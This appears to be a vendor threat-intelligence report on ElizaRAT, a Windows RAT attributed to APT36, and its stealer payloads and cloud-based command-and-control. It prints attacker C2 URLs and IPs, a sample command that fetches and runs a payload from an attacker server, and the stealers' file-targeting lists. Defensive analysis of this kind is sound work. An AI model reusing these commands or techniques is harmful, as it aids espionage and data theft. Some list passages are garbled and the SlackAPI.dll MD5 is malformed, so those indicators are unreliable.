APT36, also known as Transparent Tribe, is a Pakistan-based threat actor notorious for persistently targeting Indian government organizations, diplomatic personnel, and military facilities. APT36 has conducted numerous cyber-espionage campaigns against Windows, Linux, and Android systems.
In recent campaigns, APT36 utilized a particularly insidious Windows RAT known as ElizaRAT. First discovered in 2023, ElizaRAT has significantly evolved to enhance its evasion techniques and maintain reliability in its command and control (C2) communication.
This report focuses on ElizaRAT’s evolution. We examine the various payloads and infrastructures employed by APT36 and the malware’s inner workings, including deployment methods, second-stage payloads, and the persistent use of cloud infrastructure.
First publicly disclosed in September 2023, ElizaRAT is a Windows Remote Access Tool (RAT) utilized by Transparent Tribe in targeted attacks. ElizaRAT infections are often initiated by CPL files distributed through Google Storage links, likely distributed by phishing. ElizaRAT used Telegram channels in its earlier variants to facilitate Command and Control (C2) communication.
Since its discovery, ElizaRAT’s execution methods, detection evasion, and C2 communication have all evolved. This was apparent in three distinct campaigns that utilized the malware at the end of 2023 and the beginning of 2024. In each campaign, the attacker used a different variant of ElizaRAT to download specific second-stage payloads that automatically collect information.
The main characteristics of ElizaRAT include:
`SlackAPI.dll` (MD5: `2b1101f9078646482eb1ae497d44104`) is an ElizaRAT variant that leverages Slack channels as C2 infrastructure. It was compiled at the end of 2023 and is executed as a CPL file. CPL files are directly invoked by a double click, making spear phishing a convenient infection route.
This variant most closely resembles the original `Textsource` variants of ElizaRAT in terms of asynchronous code, functionality, and execution. It follows all the ElizaRAT characteristics and base creation functionality:
`Userinfo.dllfile within the working directory and stores in it the victim ID in the following manner:` `–.` `%appdata%SlackAPI.` `logs.txt) in the` `%appdata%SlackAPIdirectory.` `India Standard Time.`
To register the victims in the attacker C2, the malware reads the content of `Userinfo.dll` and sends it to the C2 server. The malware then continuously checks the C2 for new commands every 60 seconds.
It consists of three classes of code:
`CplAppletDelegate– Includes the MAIN function and the fundamental execution processes.` `Communication– Responsible for the C2 communication.` `Controls– Contains functions for each command that the malware can receive from the C2.`
The content received from the C2 is processed by the `FormatMsgs` function, which knows how to parse the content and run the related function from the `Controls` according to the command received from the C2.
The following are the commands the malware can process:
The C2 communication in SlackAPI.dll is managed through the `Communication` class, which uses Slack’s API to interact with the attacker. The `ReceiveMsgsInList()` function continuously polls the channel `C06BM9XTVAS` via the Slack API at `https://slack[.]com/api/conversations.history?channel=C06BM9XTVAS&count=1&limit=1`, using the bot token and the victim ID content in the request. This function runs in an endless loop, checking for new commands every 60 seconds.
For message and file handling, the `SendMsg()` function sends messages to the C2 by posting to `https://slack.com/api/chat.postMessage` with the content and channel ID `C06BWCMSF1S`, while `SendFile()` uploads files to the same channel using `https://slack.com/api/files.upload`. The `DownloadFile()` function retrieves files from a provided URL, saving them to the victim’s machine using `HttpClient` and the bot token for secure access.
The threat actor deployed an additional payload, which we named ApoloStealer, on specific targets. According to the compilation time, the variant of ApoloStealer used in this campaign was compiled one month after the ElizaRAT SlackAPI.dll variant, which might suggest that additional payloads are involved.
ApoloStealer employs techniques similar to other Transparent Tribe malware:
`India Standard time.` `%appdata%SlackAPI.` `SQLite.Interop.dllas a resource and two other mp4 files used as decoys.` `appid.dlland stores the victim ID in a similar manner:` `–.` `http://83.171.248[.]67/suitboot.php, and waits for a response.` `IWSHELLto run the file using` `rundll.` `%appdata%SlackAPIrlogs.txt.`
After creating the database file, ApoloStealer creates a table to store data in these fields: filename, file path, flag, type, and modified date. The malware then collects all DESKTOP files that do not start with `~` or `!` and have one of the following extensions:
`.ppt, .pptx, .pptm, .potx, .potm, .pot, .ppsx, .ppsm, .odp, .doc, .docm, .docx, .dot, .dotm, .dotx, .odt, .rtf, .pdf, .xls, .xlsx, .csv, .txt, .zip, .rar, .png, .jpg, .tar, .jpeg, .raw, .svg, .dwg, .heif, .heic, .psd`
After storing all the relevant files in the database file, ApoloStealer sends the data to the C2 server at the URL `http://83.171.248[.]67/oneten.php`.
The malware repeats the same process for the Downloads directory, OneDrive directory, and each fixed drive on the machine, except for `C:`.
Compiled in January 2024, the Circle ElizaRAT variant is an improved version of the malware. It utilizes an additional dropper component, which results in much lower detection rates. The Circle campaign uses a payload that resembles the SlackFiles payload and uses a similar working directory ( `%appdata%SlackAPI`).
Unlike other ElizaRAT variants, the Circle campaign does not use any cloud service as C2 infrastructure and instead uses a simple virtual private server (VPS) for C2 communication.
The sole purpose of the dropper is to set up the necessities for the execution of ElizaRAT. The function `BringCircle` drops and unpacks a zip file embedded as a resource containing the ElizaRAT malware. It also creates the working directory `%appdata%CircleCpl` and drops the decoy PDF document and MP4 file. Another feature of the malware, a known characteristic of ElizaRAT, is the creation of an LNK file for the malware, but there is no indication that any of the malware uses it. Note that the description of the LNK is `Slack API File`, which also implicates this cluster as part of the Slack campaign.
After dropping the malware, the dropper executes it with a simple `Process.start()` function.
This is the ElizaRAT variant utilized in the Circle campaign cluster. It performs the same checks and base creation as all other variants:
`India Standard Time.` `%appdata%CircleCpl, which is created by the dropper. It then sends its content to the attacker C2 at the URL` `http://38.54.84[.]83/MiddleWare/NewClient` `–), similar to other ElizaRAT variants.` `{machinename}>{username}>{IP}>{OS}>{machinetype}.` `https://check.torproject.org/api/ip, most likely to identify the victim’s outbound IP address.`
To get a new task from the attacker, the malware sends the content of the `applicationid.dll`, with the addition of `x002>` at the start of the string, to the URL `http://38.54.84[.]83/MiddleWare/GetTask` and waits for the response.
There are three tasks the malware can receive from the attacker:
`at>{URI}– In this case, the malware triggers the` `DownloadFile()function, which will download the file from the URL` `http://38.54.84[.]83/uploads/{URI}.` `in>{URL}– The malware triggers the` `DownloadFile()function, which will download a file from the given URL.` `NA>NA– The malware sleeps for 2 minutes and then triggers the` `Awake()function again.`
If the malware triggers the `DownloadFile()` function, it will also trigger the `ExtractFile()` function, designed to unpack a zip file.
The zip file contains the SQLite DLL, which will be used in the second-stage payload. It is extracted to `%appdata%SlackAPI`, the same working directory as the Slack campaign. If we examine the `RunFile()` function, we can see it is designated to execute the `SlackFiles.dll` stealer.
The fact that this malware is designated to download the `SlackFiles.dll` payload and use the same working directory as the Slack campaign suggests that these two activity clusters are part of the same campaign.
The initial infection vector used in this campaign is not clear. However, based on the file names, such as `Amended Copy.cpl` and `Threat Alert 1307-JS-9.pdf issued vide NATRAD note number 2511 CLKj dated 10 Aug 2024 in aspect of exercise Tarang Shakti-2024.pdf.cpl`, as well as past campaigns by the threat actor, they were likely sent via spear phishing.
Much like previous versions, the CPL file is a dropper responsible for setting up all the necessities for the next stage, including:
`ApplicationDataBaseFilteringEngine` `BaseFilterEngine.dll)`
The ElizaRAT variant used in this campaign leverages Google Cloud for its C2 communication. Utilizing the Google C2 channel, the actor sends commands to download the next stage payload from different virtual private servers (VPS). In this campaign, we observed the use of three different VPS.
The main ElizaRAT malware ( `baseFilteringEngine.dll`) uses the X.509 certificate to create a `ServiceAccountCredential` object for authenticating a Google Cloud Storage service account: `[email protected]`. The email associated with this service account is `[email protected]` . The malware checks for the parent folder `1Gwy3yPyyYJVoOvCMfsmhhCknC-tiuNFv` and lists all the files in that folder. Next, it locates the related victim’s tmp1 file, gets the commands and logs its actions.
The only command the malware can process is the `Transfer` command, which directs the malware to download a payload from a specific VPS address. Below is a sample format of the command the malware received for the chosen victims:
`Transfer:!http://84.247.135[.]235:8080/phenomenon/SpotifyAB.zip:!rundll32.exe:!SpotifyAB.dll:!SpotifyAB.zip:!Mean:!Doj!@g8H6fb:!SpotifyAB`
The malware splits the command at `:!` into an array, where each element represents a specific parameter of the operation:
When processing the command, the following sequence is triggered:
`DownloadProtectiondownloads a file using an` `HttpWebRequestfrom a specified URL to the file with the specified name in the working folder.` `Withdrawextracts the received file using the provided password.` `BetaDrumcreates a scheduled task that runs the file with the provided parent every 5 minutes.`
So far, we’ve seen two payloads utilized in this campaign: `extensionhelper_64.dll` and `ConnectX.dll`. Both payloads function as info stealers, each designed for a specific purpose. Despite these minor changes, the payloads’ core functionality and primary purpose remained consistent throughout the campaign.
The `extensionhelper_64.dll` file is downloaded to the victim’s machine as `SpotifyAB.dll` or `Spotify-news.dll` and is executed by the scheduled task, which runs the `Mean` function via `rundll32.exe`. This payload is a file stealer that collects specific file types, stores their metadata in a database, and exfiltrates it to the C2 server.
First, the malware creates an SQLite database file, which interacts with using the `DBmanager` class and the `SQLite.Interop.dll`. The SQLite DLL is embedded in the malware in a protected zip file, which the malware extracted using a plain text password.
While iterating over all files on the fixed drives, the malware skips directories such as `Program Files`, `Windows`, `ProgramData`, and `AppData` to avoid processing system directories. It also filters out files that start with `$`, `.`, or `~`, which are typically system or temporary files. The malware is only interested in these file suffixes:
`.xla .xlam .xll .xlm .xlsm .xlt .xltm .xltx .dif .xls .xlsx .ppt .pptx .pot .potm .potx .ppam .pps .ppsm .ppsx .pptm .pub .rtf .sldm .sldx .pdf .jpg .png .jpeg .odf .odg .zip .csv .xlc .rar .tar`
The malware stores the name, path, and another parameter called `isUploaded` for each relevant file. `isUploaded` is a boolean variable indicating whether the file was uploaded to the C2. If a file wasn’t uploaded to the C2, the malware calls the `sendRequest` function, which reads the file’s byte content and sends it to the C2 while updating its upload status.
Like the other malware in this campaign, it also hides some of its operations in a text blob, which it splits by `‘ ‘` (space). The information it tries to hide includes its C2 server and the different web pages it communicates with, even though they are not eventually used:
An additional payload is designed to examine files on external drives, such as USBs. This malware utilizes WMI (Windows Management Instrumentation) to list all relevant files on external drives and targets the same file extensions. However, instead of storing them in a database, it stores them in an archive it creates in the `BaseFilteringEngine` working directory.
The malware uses WMI to monitor the creation of new disk drives every two seconds, most likely to detect the insertion of a USB drive:
`SELECT * FROM __InstanceCreationEvent WITHIN 2 WHERE TargetInstance ISA ‘Win32_DiskDrive’`
For each device, it retrieves the device ID and serial number and checks for the correct disk partition to iterate on. Unlike other ElizaRAT-associated stealers, ConnectX doesn’t have a C2 server to exfiltrate the data to; it just stores the data in a zip file in the ElizaRAT working directory %appdata%\BaseFilteringEngine.
ElizaRAT is a custom tool known to be employed exclusively by “Transparent Tribe” against targets similar to those described in this report. This is in addition to other indicators linked to the group’s campaigns, including using an overlapping email account in a different activity cluster targeting Linux systems.
Like other malware associated with Transparent Tribe, all the samples presented here used the name `Apolo Jones`. In the Google Drive campaign, the decoy PDF file attributes its authorship to `Apolo Jones`, a distinctive name previously observed in various aspects of Transparent Tribe’s operations.
The use of `Apolo Jones` occurs differently in the campaigns. For example, in the Circle dropper, the password `ApoloJones2024` is used to uncompress the zip file. In addition, the function responsible for checking the time zone in the `SlackFiles.dll` payload is also named `ApoloJones`.
The internal checks the ElizaRAT variants perform suggest the campaigns exclusively targeted Indian systems, evidenced by each malware variant’s initial function of verifying whether the system’s time zone was set to `’India Standard Time’`.
The progression of ElizaRAT reflects APT36’s deliberate efforts to enhance their malware to better evade detection and effectively target Indian entities. By integrating cloud services like Google Drive, Telegram, and Slack into their command and control infrastructure, they exploit commonly used platforms to mask their activities within regular network traffic.
Introducing new payloads such as ApolloStealer marks a significant expansion of APT36’s malware arsenal and suggests the group is adopting a more flexible, modular approach to payload deployment. These methods primarily focus on data collection and exfiltration, underscoring their sustained emphasis on intelligence gathering and espionage.
Harmony Endpoint
Threat Emulation
**Files**